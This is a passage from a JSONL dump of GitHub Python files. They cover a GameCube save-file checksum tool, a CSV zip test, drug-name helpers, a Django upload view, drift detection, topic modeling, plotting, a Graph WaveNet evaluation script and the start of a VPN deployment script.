0x2000)\n self.raw_bytes[target_offset:target_offset + 0x10] = new_checksum\n else:\n print(\"[!] Can't set checksum bytes for block {}\".format(blknum))\n exit(-1)\n\n def checksum_region_0(self):\n \"\"\" Compute the header checksum \"\"\"\n base_offset = 0x40\n data_size = 0x1e40\n return self._checksum(base_offset, data_size)\n def checksum_header(self):\n \"\"\" Compute the header checksum \"\"\"\n base_offset = 0x1ec0\n data_size = 0x180\n return self._checksum(base_offset, data_size)\n def checksum_block(self, blknum):\n \"\"\" Given some block number 0-10, compute the checksum for the\n associated data. Returns the raw checksum bytes. \"\"\"\n base_offset = 0x2050\n data_size = 0x1ff0\n if (blknum >= 0) and (blknum <= (self.blocksize() - 1)):\n target_offset = base_offset + (blknum * 0x2000)\n return self._checksum(target_offset, data_size)\n else:\n print(\"[!] Can't compute checksum bytes for block {}\".format(blknum))\n exit(-1)\n\n def recompute_checksums(self):\n \"\"\" Recompute all checksum values and write them back \"\"\"\n if (self.packed is True):\n print(\"[!] 
You can only recompute checksums on unpacked data\")\n exit(-1)\n\n if (self.get_raw_header_checksum() != self.checksum_header()):\n print(\"[*] Header checksum mismatch, fixing ..\")\n self.set_raw_header_checksum(self.checksum_header())\n else:\n print(\"[*] Header checksum unchanged\")\n\n # Retrieve checksum values for all blocks\n current = []\n for i in range(0, self.blocksize()-1):\n current.append(self.get_raw_checksum(i))\n\n # Compute checksum values for all blocks\n computed = []\n for i in range(0, self.blocksize()-1):\n computed.append(self.checksum_block(i))\n\n # If current checksums don't match, write them back\n for i in range(0, self.blocksize()-1):\n if (current[i] != computed[i]):\n print(\"[*] Block {} checksum mismatch, fixing ..\".format(i))\n self.set_raw_checksum(i, computed[i])\n else:\n print(\"[*] Block {} checksum unchanged\".format(i))\n\n\n def unpack(self):\n \"\"\" Unpack all data \"\"\"\n if (self.packed is False):\n print(\"[!] Data is already unpacked - refusing to unpack\")\n exit(-1)\n print(\"[*] Unpacking GCI data\")\n\n # Unpack the data header region\n PREV_BYTE_OFFSET = 0x1ebf\n BASE_OFFSET = 0x1ec0\n DATA_SIZE = 0x180\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = unpack(prev, cursor)\n self.raw_bytes[i] = res\n prev = cursor\n\n PREV_BYTE_OFFSET = 0x204f\n BASE_OFFSET = 0x2050\n DATA_SIZE = 0x1ff0\n for j in range(0, self.blocksize() - 1):\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = unpack(prev, cursor)\n self.raw_bytes[i] = res\n prev = cursor\n PREV_BYTE_OFFSET += 0x2000\n BASE_OFFSET += 0x2000\n\n if (self.packed is True):\n self.packed = False\n\n\n def pack(self):\n \"\"\" Pack all blocks of data \"\"\"\n if (self.packed is True):\n print(\"[!] 
Data is already packed -- refusing to pack\")\n exit(-1)\n print(\"[*] Packing GCI data\")\n\n # Pack the data header region\n PREV_BYTE_OFFSET = 0x1ebf\n BASE_OFFSET = 0x1ec0\n DATA_SIZE = 0x180\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = pack(prev, cursor)\n self.raw_bytes[i] = res\n prev = res\n\n PREV_BYTE_OFFSET = 0x204f\n BASE_OFFSET = 0x2050\n DATA_SIZE = 0x1ff0\n for j in range(0, self.blocksize()-1):\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = pack(prev, cursor)\n self.raw_bytes[i] = res\n prev = res\n PREV_BYTE_OFFSET += 0x2000\n BASE_OFFSET += 0x2000\n if (self.packed is False):\n self.packed = True\n\n","repo_name":"eigenform/melee-re","sub_path":"src/meleegci-py/meleegci.py","file_name":"meleegci.py","file_ext":"py","file_size_in_byte":14222,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"92"} +{"seq_id":"32144921517","text":"import unittest\n\nimport zipfile\n\nimport codecs\nimport csv\nfrom csv import writer\n\nfrom csv import reader\n\nfrom zipfile import ZipFile\n\nimport os\n\n#Script test case to test function in the main\n\n#Class to test the Ziplist function in the main\nclass TestZipList(unittest.TestCase):\n\n def test_zip_list(self):\n\n z_read = zipfile.ZipFile(\"zipfile.zip\", \"r\")\n z_write = zipfile.ZipFile(\"zipfile.zip\", \"a\")\n\n for file in z_read.namelist():\n\n print('File:', file)\n\n z_read.namelist()\n\n with z_read.open(file, \"r\") as read_files:\n\n reader = csv.DictReader(codecs.iterdecode(read_files, 'utf-8'))\n\n for line in reader:\n print(line)\n\n with z_write.open('Combined.csv', \"w\") as write:\n\n fieldname = ['Adress', 'Name']\n\n csv_writer = csv.DictWriter(write, fieldnames=fieldname, delimiter='\\t')\n\n csv_writer.writeheader\n\n for line in reader:\n csv_writer.writerow(line)\n\n return line, file\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n unittest.TestCase()\n","repo_name":"Stan5597/Data-Engineering-test-code","sub_path":"TestZipfile.py","file_name":"TestZipfile.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"75019829739","text":"import pandas as pd\nimport unicodedata\nimport regex as re\nimport json\n\ndef jsonl_loader(filename):\n \"\"\"\n trial_file: File with JSONL input\n \"\"\"\n file_io = open(filename)\n json_content = [json.loads(jline) for jline in file_io.read().splitlines()]\n dataframe = pd.DataFrame(json_content)\n return dataframe\n\ndef csv_loader(filename):\n dataframe = pd.read_csv(filename, sep = \",\", quotechar=\"\\\"\")\n return dataframe\n\ndef get_all_drugs_names(dataframe):\n dataframe['alts'] = dataframe.altLabel_list.apply(lambda x: x.split('|'))\n drug_list = []\n\n drug_list = [drug for alt_drugs in dataframe['alts'] for drug in alt_drugs]\n drug_list.extend(dataframe.itemLabel)\n drug_list = list(filter(None, drug_list))\n return drug_list\n\ndef group_drugs_by_first_letter(drug_list):\n drug_dict = {}\n for drug in drug_list:\n try:\n if len(drug) > 1:\n drug_name = preprocess_name(drug)\n if drug_name[0] in drug_dict:\n drug_dict[drug_name[0]].append(drug_name)\n else:\n drug_dict[drug_name[0]] = [drug_name]\n except IndexError:\n pass\n return drug_dict\n\ndef preprocess_name(drug_name):\n parentheses_trans = 
str.maketrans({\"(\":None, \")\":None, \"{\":None, \"}\":None, \"[\":None, \"]\":None, \"/\":\" \", \"\\\\\":\" \"})\n drug_name = remove_accented_chars(drug_name)\n drug_name = drug_name.translate(parentheses_trans)\n drug_name = drug_name.lower().rstrip().lstrip()\n return drug_name\n\ndef get_multiple_names(drug_name):\n drug_names = []\n drug_name = drug_name.split('+')\n for drug in drug_name:\n drug = drug.split('and')\n if len(drug) > 1:\n drug_names.extend(drug)\n return drug_names\n\ndef remove_accented_chars(drug_name):\n drug_name = unicodedata.normalize('NFKD', drug_name).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n return drug_name\n\ndef create_drug_references(dataframe):\n drug_ref = {}\n dataframe['alts'] = dataframe.altLabel_list.apply(lambda x: x.split('|'))\n drug_ref_df = dataframe[[\"itemLabel\", \"alts\"]]\n for idx, row in drug_ref_df.iterrows():\n for val in row.alts:\n val = preprocess_name(val)\n label = preprocess_name(row.itemLabel)\n drug_ref[val] = label\n drug_ref[label] = label\n return drug_ref\n ","repo_name":"jh2048/clinical_trials","sub_path":"scripts/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12328775500","text":"from django.core.files.uploadedfile import UploadedFile\nfrom django.shortcuts import render\nfrom django.utils.text import slugify\n\nfrom .forms import UploadForm\nfrom .models import Document, WordResult\n\n\ndef handle_upload(f: UploadedFile): # pragma: no cover\n \"\"\"Store uploaded file as a document. Existing documents (determined by filename) are overwritten.\n Non-text files are rejected.\"\"\"\n\n if f.content_type != \"text/plain\":\n raise NotImplementedError(\n f\"Filetype not handled. Please upload a text/plain file.\"\n )\n\n name = slugify(f.name.replace(\".txt\", \"\"))\n content = f.read().decode(\n \"utf-8\"\n ) # we assume small files, so we don't use f.chunk()\n\n existing_queryset = Document.objects.filter(name__exact=name)\n\n # create new document, or overwrite existing one\n if len(existing_queryset) == 0:\n document = Document(name=name, full_text=content)\n else:\n document = existing_queryset[0]\n document.full_text = content\n\n document.save()\n\n # process document\n try:\n document.ingest()\n except LookupError:\n raise LookupError(\n \"LookupError while running ingest function. Did you run initwordy before starting the site?\"\n )\n\n\ndef index(request): # pragma: no cover\n \"\"\"On GET, generate app form and results. 
On POST, process the uploaded text file.\"\"\"\n\n if request.method == \"POST\":\n form = UploadForm(request.POST, request.FILES)\n if form.is_valid():\n handle_upload(request.FILES[\"document_file\"])\n\n form = UploadForm() # reset form\n words_by_frequency = WordResult.get_words_by_frequency()\n context = {\"form\": form, \"word_by_frequency\": words_by_frequency}\n\n return render(request, \"wordy/index.html\", context)\n","repo_name":"lofidevops/simplenlp","sub_path":"wordy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31222442507","text":"\"\"\"\nDrift Detection Method\nGama et al.\n\"\"\"\nfrom ._base_drift import BaseDrift\nimport numpy as np\n\nclass DDM(BaseDrift):\n def __init__(self, warning_level=2.0, alarm_level=3.0, min_n_errors = 30) -> None:\n super().__init__()\n self.warning_level = warning_level\n self.alarm_level = alarm_level\n self.min_n_errors = min_n_errors\n \n # Highest\n self.min_std = np.inf\n self.min_error = np.inf\n self.min_std_error = np.inf\n \n self.error_prob = 1\n self.error_std = 0\n self.error_prob_std = 0\n\n # [DEBUG]\n self.errors = []\n\n def _apply(self):\n if self.n < self.min_n_errors:\n return False\n # Go over elements in window and compute probs\n for e in self.window:\n self.error_prob += (e-self.error_prob)/self.n\n self.error_std = np.sqrt(self.error_prob*(1-self.error_prob)/self.n)\n \n # [DEBUG]\n self.errors.append(self.error_prob)\n \n # Clear window\n self.window = []\n \n if (self.error_prob+self.error_std) < self.min_std_error:\n self.min_error = self.error_prob\n self.min_std = self.error_std\n self.min_std_error = self.min_error+self.min_std\n \n if self.error_prob+self.error_std > self.min_error + self.alarm_level*self.min_std:\n self._drift_alarm = True\n self.reset()\n elif self.error_prob+self.error_std > self.min_error + self.warning_level*self.min_std:\n self._drift_warning = True\n \n def reset(self):\n self.min_std = np.inf\n self.min_error = np.inf\n self.min_std_error = np.inf\n self.n = 0\n\nif __name__ == \"__main__\":\n from matplotlib import pyplot as plt\n r1 = np.random.binomial(1,0.3,1000)\n r2 = np.random.binomial(1,0.7,1000)\n r = np.concatenate((r1,r2))\n \n dd = DDM()\n for i,x in enumerate(r):\n dd.add_element(x)\n if dd.drift_alarm:\n print(f'drift alarm {i}')\n \n plt.plot(dd.errors)\n plt.show()\n","repo_name":"charliehpearce/drift-lib","sub_path":"drift_detection/_DDM.py","file_name":"_DDM.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40395474317","text":"import os\r\nimport re\r\nfrom datetime import datetime\r\nimport json\r\nimport pandas as pd\r\nimport tomotopy as tp\r\nimport spacy\r\nimport numpy as np\r\n\r\n\r\ndef cleaning_docs(df, docs_file):\r\n\r\n docs_d = {} # dictionary of documents to perform topic modeling on, here documents are posts' clean sentences\r\n stopwords = set([line.strip() for line in open(\"stoplist_final.txt\")]) # creating list of stop words\r\n nlp = spacy.load(\"en_core_web_sm\") # loading the spacy language model\r\n lemmatizer = nlp.get_pipe(\"lemmatizer\") # getting the spacy lemmatizer\r\n\r\n for index, row in df.iterrows(): # iterating over posts\r\n post_id = row['concat_id'] # id of the post, e.g. 
'Endo_xyz'\r\n post = row['selftext'] # textual content of the post\r\n post_url = row['url'] # url of the post\r\n doc = nlp(post) # processing the post: tokenizing and lemmatizing\r\n sent_n = 0 # counter of sentences in the post\r\n for sent in doc.sents:\r\n sent_id = f'{post_id}_{sent_n}' # creating an id for each post' sentence\r\n sent_n += 1\r\n clean_sent = [] # sentences represented as list of lemmatized tokens\r\n for token in sent:\r\n lemma = token.lemma_\r\n clean_lemma = re.sub(r'[^\\w\\s\\d]', '', lemma) # remove punctuation from tokens\r\n clean_lemma = re.sub(r'[\\n+\\s+]', '', clean_lemma) # remove empty spaces and new lines\r\n if clean_lemma and clean_lemma not in stopwords: # remove empty tokens/stopwords\r\n clean_sent.append(clean_lemma) # adding clean lemma to the clean sentence's list\r\n if len(clean_sent) > 4: # exclude sentences that are less than 5 words\r\n # add sentence id and clean sentence, og sentence, url to the dictionary as a key,value pair\r\n # the clean - tokenized and lemmatized - sentences are our documents\r\n docs_d[sent_id] = [clean_sent, sent.text, post_url]\r\n\r\n with open(docs_file, 'w') as jsonfile: # creating a file with the dict of documents to topic model\r\n json.dump(docs_d, jsonfile)\r\n\r\n return docs_d\r\n\r\n\r\ndef perform_tm(s_ids, corpus, n_topics, rm_top, topwords_file):\r\n\r\n # setting and loading the LDA model\r\n lda_model = tp.LDAModel(k=n_topics, # number of topics in the model\r\n min_df=3, # remove words that occur in less than n documents\r\n rm_top=rm_top) # remove n most frequent words\r\n vocab = set()\r\n for doc in corpus:\r\n lda_model.add_doc(doc) # adding document to the model\r\n vocab.update(doc) # adding tokens in the document to the vocabulary\r\n print('Num docs:{}'.format(len(lda_model.docs)))\r\n print(\"Vocabulary Size: {}\".format(len(list(vocab))))\r\n print('Removed Top words: ', lda_model.removed_top_words)\r\n\r\n iterations = 10\r\n for i in range(0, 100, iterations): # train model 10 times with 10 iterations at each training = 100 iterations\r\n lda_model.train(iterations)\r\n print(f'Iteration: {i}\\tLog-likelihood: {lda_model.ll_per_word}')\r\n\r\n #TOP WORDS\r\n num_top_words = 10 # number of top words to print for each topic\r\n with open(topwords_file, \"w\", encoding=\"utf-8\") as file:\r\n file.write(f\"\\nTopics in LDA model: {n_topics} topics {rm_top} removed top words\\n\\n\") # write settings of the model in file\r\n topic_individual_words = []\r\n for topic_number in range(0, n_topics): # for each topic number in the total number of topics\r\n topic_words = ' '.join( # string of top words in the topic\r\n word for word, prob in lda_model.get_topic_words(topic_id=topic_number, top_n=num_top_words)) # get_topic_words is a tomotopy function that returns a dict of words and their probabilities\r\n topic_individual_words.append(topic_words.split(' ')) # append list of the topic's top words for later\r\n file.write(f\"Topic {topic_number}\\n{topic_words}\\n\\n\") # write topic number and top words in file\r\n print(topic_individual_words)\r\n\r\n #TOPIC DISTRIBUTIONS\r\n topic_distributions = [list(doc.get_topic_dist()) for doc in lda_model.docs] # list of lists of topic distributions for each document, get_topic_dist() is a tomotopy function\r\n topic_results = []\r\n for topic_distribution in topic_distributions: # list of dicts of documents' topic distributions to convert into pandas' dataframe\r\n topic_results.append({'topic_distribution': topic_distribution})\r\n df = 
pd.DataFrame(topic_results, index=s_ids) # df where each row is the list of topic distributions of a document, s_ids are the ids of the sentences\r\n column_names = [f\"Topic {number} {' '.join(topic[:4])}\" for number, topic in enumerate(topic_individual_words)] # create list of column names from topic numbers and top words\r\n df[column_names] = pd.DataFrame(df['topic_distribution'].tolist(), index=df.index) # df where topic distributions are not in a list and match the list of column names\r\n df = df.drop('topic_distribution', axis='columns') # drop old topic distributions' column\r\n dominant_topic = np.argmax(df.values, axis=1) # get dominant topic for each document\r\n df['dominant_topic'] = dominant_topic # add column for the dominant topic in the document\r\n\r\n return df\r\n\r\n\r\ndef main(subreddit):\r\n\r\n reddit_df = pd.read_csv(os.path.join('data', f'{subreddit}.csv')) # path of csv with reddit data\r\n tomo_folder = os.path.join('output', 'topic_modeling') # results' folder\r\n if not os.path.exists(tomo_folder): # create folder if it doesn't exist\r\n os.makedirs(tomo_folder)\r\n\r\n clean_docs_file = os.path.join(tomo_folder, f'{subreddit}.json') # file with clean documents - here, post sentences\r\n if not os.path.exists(clean_docs_file): # if clean documents file doesn't exist, executes data cleaning\r\n start = datetime.now()\r\n print(\"Data Cleaning...\")\r\n docs_dict = cleaning_docs(reddit_df, clean_docs_file)\r\n print(f'{str(datetime.now())}________________{str(datetime.now() - start)}\\n') # print timing of data cleaning\r\n else:\r\n with open(clean_docs_file) as json_file:\r\n docs_dict = json.load(json_file)\r\n doc_ids = [doc_id for doc_id in docs_dict.keys()] # get list of document ids for later\r\n clean_docs = [sent_url[0] for sent_url in docs_dict.values()] # get list of clean documents for later\r\n og_docs = [[sent_url[1]] for sent_url in docs_dict.values()] # get list of original documents for later\r\n #doc_urls = [sent_url[2] for sent_url in docs_dict.values()] # get list of document urls for later\r\n\r\n for num_topics in [7, 10, 15]: # for number of topics - for loops allow to run multiple models with different settings with one execution\r\n for rm_frequent in [15]: # for number of most frequent words to remove\r\n\r\n txt_topwords = os.path.join(tomo_folder, f'{subreddit}-{num_topics}_{rm_frequent}.txt') # path for top words file\r\n csv_dtm = os.path.join(tomo_folder, f'{subreddit}-{num_topics}_{rm_frequent}.csv') # path for doc-topic matrix file\r\n\r\n if not os.path.exists(txt_topwords) or not os.path.exists(csv_dtm): # if result files don't exist, performs topic modeling\r\n start = datetime.now()\r\n print(\"Performing Topic Modeling...\")\r\n lda_dtm = perform_tm(doc_ids, clean_docs, num_topics, rm_frequent, txt_topwords)\r\n lda_dtm['sent'] = og_docs # add original sentences to doc-topic df\r\n #lda_dtm['post_url'] = doc_urls # add urls of the posts of the sentences to matrix\r\n lda_dtm.to_csv(csv_dtm) # convert doc-topic df in csv file\r\n print(f'{str(datetime.now())}____Topic modeling {num_topics}, {rm_frequent} time:____{str(datetime.now() - start)}\\n') # print timing of topic modeling\r\n\r\n\r\nif __name__ == '__main__':\r\n main('endo+endometriosis') # name of the subreddit file\r\n","repo_name":"federicabologna/endometriosis","sub_path":"topic_modeling.py","file_name":"topic_modeling.py","file_ext":"py","file_size_in_byte":8030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} 
+{"seq_id":"23062378533","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 02 16:55:22 2018\n\n@author: Daniel\n\"\"\"\nimport pandas as pd\nimport seaborn as sns\nimport os as os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndegree_sign= u'\\N{DEGREE SIGN}'\nimport matplotlib\nmatplotlib.rcParams['mathtext.fontset'] = 'custom'\nmatplotlib.rcParams['mathtext.rm'] = 'Bitstream Vera Sans'\nmatplotlib.rcParams['mathtext.it'] = 'Bitstream Vera Sans:italic'\nmatplotlib.rcParams['mathtext.bf'] = 'Bitstream Vera Sans:bold'\n\n\n\n\n\n#Change directory to folder containing rates.csv file\nindir='C:\\\\Users\\\\Daniel\\\\Documents\\\\farmscripts\\\\Stuff for mark\\\\'\nrates = pd.read_csv(indir+'rates.csv')\n\nrates1 = rates[rates['experiment']==1]\n\nrates1['J+Tot']=rates1['J']+rates1['J+']\nrates1['J-Tot']=rates1['J']-rates1['J-']\n\nrates1['logJ']=rates1['J'].apply(np.log10)\nrates1['logJ+']= rates1['J+Tot'].apply(np.log10)-rates1['logJ']\nrates1['logJ-']=rates1['logJ']-rates1['J-Tot'].apply(np.log10)\nyerr=(rates1['logJ+'], rates1['logJ-'])\n\n\nrates3 = rates[rates['experiment']==3]\n\nrates3['J+Tot']=rates3['J']+rates3['J+']\nrates3['J-Tot']=rates3['J']-rates3['J-']\n\nrates3['logJ']=rates3['J'].apply(np.log10)\nrates3['logJ+']= rates3['J+Tot'].apply(np.log10)-rates3['logJ']\nrates3['logJ-']=rates3['logJ']-rates3['J-Tot'].apply(np.log10)\nyerr3=(rates3['logJ+'], rates3['logJ-'])\n\n\nfig, ax1 = plt.subplots()\nax1.errorbar(x= rates3['T'], y=rates3['logJ'], xerr = 0.4, yerr=yerr3,fmt='o', \n ecolor = 'b', lw=0.5, label = 'exp. 3' )\nsns.regplot(x=\"T\", y=\"logJ\", data=rates3, ax = ax1, color = 'b', ci= None)\n\n\nax1.errorbar(x= rates1['T'], y=rates1['logJ'], xerr = 0.4, yerr=yerr,fmt='o', ecolor = 'r',\n markerfacecolor = 'r', mec='r', lw=0.5, label = 'exp. 
1')\nsns.regplot(x=\"T\", y=\"logJ\", data=rates1, ax = ax1, color = 'r', ci= None)\nax1.set_xlabel ('Temperature ('+degree_sign+'C)')\nax1.set_ylabel(r'$\\mathrm{Log_{10} \\enspace J \\enspace (cm^{-2})}$' )\nplt.legend()\n\n\n","repo_name":"danielosullivan2007/Farmscripts","sub_path":"formark.py","file_name":"formark.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"8525290352","text":"class Problem:\n def __init__(self, value_coefficient, weight_penalty, count_penalty, population_size):\n self.value_coefficient = value_coefficient\n self.weight_penalty = weight_penalty\n self.count_penalty = count_penalty\n self.population_size = population_size\n\n self.weights = []\n self.max_weight = 0\n self.values = []\n self.individual_size = 0\n self.minimum_objects = 0\n self.maximum_objects = 0\n\n def load_file(self, filename):\n with open(filename, 'r') as file:\n self.max_weight = int(file.readline())\n self.minimum_objects = int(file.readline())\n self.maximum_objects = int(file.readline())\n self.individual_size = int(file.readline())\n\n self.weights = list(map(int, file.readline().split(' ')))\n self.values = list(map(int, file.readline().split(' ')))\n","repo_name":"andrei-i-gavrila/JewelryExhibitionEA","sub_path":"ea/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18566134991","text":"import torch\nimport util\nimport argparse\nfrom model import *\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nfrom engine import trainer\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--device',type=str,default='cuda:0',help='')\nparser.add_argument('--data',type=str,default='data/METR-LA',help='data path')\nparser.add_argument('--data_id',type=str,default='METR-LA',help='data path')\nparser.add_argument('--adjdata',type=str,default='data/sensor_graph/adj_mx.pkl',help='adj data path')\nparser.add_argument('--adjtype',type=str,default='doubletransition',help='adj type')\nparser.add_argument('--gcn_bool',action='store_true',help='whether to add graph convolution layer')\nparser.add_argument('--aptonly',action='store_true',help='whether only adaptive adj')\nparser.add_argument('--addaptadj',action='store_true',help='whether add adaptive adj')\nparser.add_argument('--randomadj',action='store_true',help='whether random initialize adaptive adj')\nparser.add_argument('--seq_length',type=int,default=12,help='')\nparser.add_argument('--nhid',type=int,default=32,help='')\nparser.add_argument('--in_dim',type=int,default=2,help='inputs dimension')\nparser.add_argument('--num_nodes',type=int,default=207,help='number of nodes')\nparser.add_argument('--batch_size',type=int,default=64,help='batch size')\nparser.add_argument('--learning_rate',type=float,default=0.001,help='learning rate')\nparser.add_argument('--dropout',type=float,default=0.3,help='dropout rate')\nparser.add_argument('--weight_decay',type=float,default=0.0001,help='weight decay rate')\nparser.add_argument('--checkpoint',type=str,help='')\nparser.add_argument('--plotheatmap',type=str,default='True',help='')\n\n# EMA\nparser.add_argument('--use_ema', action='store_true')\nparser.add_argument('--epsilon', type=float, default=0.001)\nparser.add_argument('--moving_average_decay', type=float, 
default=0.99)\nparser.add_argument('--standing_steps', type=int, default=100)\nparser.add_argument('--start_iter', type=int, default=300)\nparser.add_argument('--ema_loss', type=str, default='BDFMSE', choices=['DFMSE', 'BDFMSE', 'TDFMSE', 'PDFMSE', 'CSMSE'])\nparser.add_argument('--ema_eval_model', type=str, default='target', choices=['source', 'target'])\n\nargs = parser.parse_args()\n\n# exp id\nargs.exp_id = \"id_\"\nargs.exp_id += \"data_\" + str(args.data_id) + \"_\"\nargs.exp_id += \"ema_\" + str(args.use_ema) + \"_\"\nargs.exp_id += \"eps_\" + str(args.epsilon) + \"_\"\nargs.exp_id += \"mad_\" + str(args.moving_average_decay) + \"_\"\nargs.exp_id += \"sit_\" + str(args.start_iter) + \"_\"\nargs.exp_id += \"lr_\" + str(args.learning_rate) + \"_\"\n#args.exp_id += \"lr_\" + str(args.learning_rate)\n\nprint(args.exp_id)\n\n# checkpoints, outputs\nif args.use_ema:\n os.makedirs(os.path.join(\"outputs\", args.data_id, \"wavebound\", args.exp_id, \"epoch\"), exist_ok=True)\n args.output_dir = os.path.join(\"outputs\", args.data_id, \"wavebound\")\n args.checkpoint_dir = os.path.join(\"checkpoints\", args.data_id, \"wavebound\")\nelse:\n os.makedirs(os.path.join(\"outputs\", args.data_id, \"origin\", args.exp_id, \"epoch\"), exist_ok=True)\n args.output_dir = os.path.join(\"outputs\", args.data_id, \"origin\")\n args.checkpoint_dir = os.path.join(\"checkpoints\", args.data_id, \"origin\")\n\n\ndef main():\n device = torch.device(args.device)\n _, _, adj_mx = util.load_adj(args.adjdata,args.adjtype)\n dataloader = util.load_dataset(args.data, args.batch_size, args.batch_size, args.batch_size)\n scaler = dataloader['scaler']\n supports = [torch.tensor(i).to(device) for i in adj_mx]\n\n print(args)\n\n if args.randomadj:\n adjinit = None\n else:\n adjinit = supports[0]\n\n if args.aptonly:\n supports = None\n\n # testing\n print(\"Testing\")\n eval_path = os.path.join(args.checkpoint_dir, args.exp_id, \"epoch\", \"best.pth\") if not args.use_ema \\\n else os.path.join(args.checkpoint_dir, \"target\", args.exp_id, \"epoch\", \"best.pth\")\n engine = trainer(scaler, args.in_dim, args.seq_length, args.num_nodes, args.nhid, args.dropout,\n args.learning_rate, args.weight_decay, device, supports, args.gcn_bool, args.addaptadj,\n adjinit, args)\n\n engine.eval_model.load_state_dict(torch.load(eval_path))\n engine.eval_model.eval()\n\n print('model load successfully')\n\n outputs = []\n realy = torch.Tensor(dataloader['y_test']).to(device)\n realy = realy.transpose(1,3)[:,0,:,:]\n\n for iter, (x, y) in enumerate(dataloader['test_loader'].get_iterator()):\n testx = torch.Tensor(x).to(device)\n testx = testx.transpose(1,3)\n with torch.no_grad():\n preds = engine.eval_model(testx).transpose(1,3)\n outputs.append(preds.squeeze())\n\n yhat = torch.cat(outputs,dim=0)\n yhat = yhat[:realy.size(0),...]\n\n\n\n\n amae = []\n amape = []\n armse = []\n for i in range(12):\n pred = scaler.inverse_transform(yhat[:,:,i])\n real = realy[:,:,i]\n metrics = util.metric(pred,real)\n log = 'Evaluate best model on test data for horizon {:d}, Test MAE: {:.4f}, Test MAPE: {:.4f}, Test RMSE: {:.4f}'\n print(log.format(i+1, metrics[0], metrics[1], metrics[2]))\n amae.append(metrics[0])\n amape.append(metrics[1])\n armse.append(metrics[2])\n\n log = 'On average over 12 horizons, Test MAE: {:.4f}, Test MAPE: {:.4f}, Test RMSE: {:.4f}'\n print(log.format(np.mean(amae),np.mean(amape),np.mean(armse)))\n\n # save output as np\n print(f\"save output as numpy... 
{os.path.join(args.output_dir, args.exp_id, 'epoch')}\")\n\n outp = scaler.inverse_transform(yhat)\n outp = outp.cpu().numpy()\n realy = realy.cpu().numpy()\n with open(os.path.join(args.output_dir, args.exp_id, 'epoch', 'true.npy'), 'wb') as f:\n np.save(f, realy)\n with open(os.path.join(args.output_dir, args.exp_id, 'epoch', 'pred.npy'), 'wb') as f:\n np.save(f, outp)\n print(\"done.\")\n\n '''\n Heatmaps\n if args.plotheatmap == \"True\":\n adp = F.softmax(F.relu(torch.mm(model.nodevec1, model.nodevec2)), dim=1)\n device = torch.device('cpu')\n adp.to(device)\n adp = adp.cpu().detach().numpy()\n adp = adp*(1/np.max(adp))\n df = pd.DataFrame(adp)\n sns.heatmap(df, cmap=\"RdYlBu\")\n plt.savefig(\"./emb\"+ '.pdf')\n\n y12 = realy[:,99,11].cpu().detach().numpy()\n yhat12 = scaler.inverse_transform(yhat[:,99,11]).cpu().detach().numpy()\n\n y3 = realy[:,99,2].cpu().detach().numpy()\n yhat3 = scaler.inverse_transform(yhat[:,99,2]).cpu().detach().numpy()\n\n df2 = pd.DataFrame({'real12':y12,'pred12':yhat12, 'real3': y3, 'pred3':yhat3})\n df2.to_csv('./wave.csv',index=False)\n\n '''\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"carrtesy/Graph-WaveNet-WaveBound","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"33953101775","text":"import threading\nimport time\n\nfrom src.main.python.net.i2cat.cnsmo.lib.model.service import Service\n\nfrom src.main.python.net.i2cat.cnsmo.deployment.bash import BashDeployer\nfrom src.main.python.net.i2cat.cnsmo.manager.cnsmo import CNSMOManager\nfrom src.main.python.net.i2cat.cnsmoservices.vpn.manager.vpn import VPNManager\nfrom src.main.python.net.i2cat.cnsmo.factory.system.state.factory import SystemStateFactory\n\n\ndef get_server_app_request():\n \"\"\"\n Main request necessary to create an APP from a service.\n It contains the ID, no resources and no dependencies. The trigger, which is the command to execute this app\n The trigger is quite intrusive, it requires some refactor to make it clearer and easy to use\n :return:\n \"\"\"\n d = dict(service_id=\"server_123\",\n trigger= \"cp /home/oscarcillo/example/server.py /home/CNSMO/ENVS/server_123/server.py && python /home/CNSMO/ENVS/server_123/server.py\",\n resources = [],\n dependencies=[],\n endpoints= [{ \"uri\":\"http://127.0.0.1:9092/server/{param}\",\n \"driver\":\"REST\",\n \"logic\":\"get\",\n \"name\":\"start\"}])\n\n service = Service()\n service.objectify(**d)\n return service\n\n\ndef get_cert_app_request():\n d = dict(service_id=\"cert_123\",\n 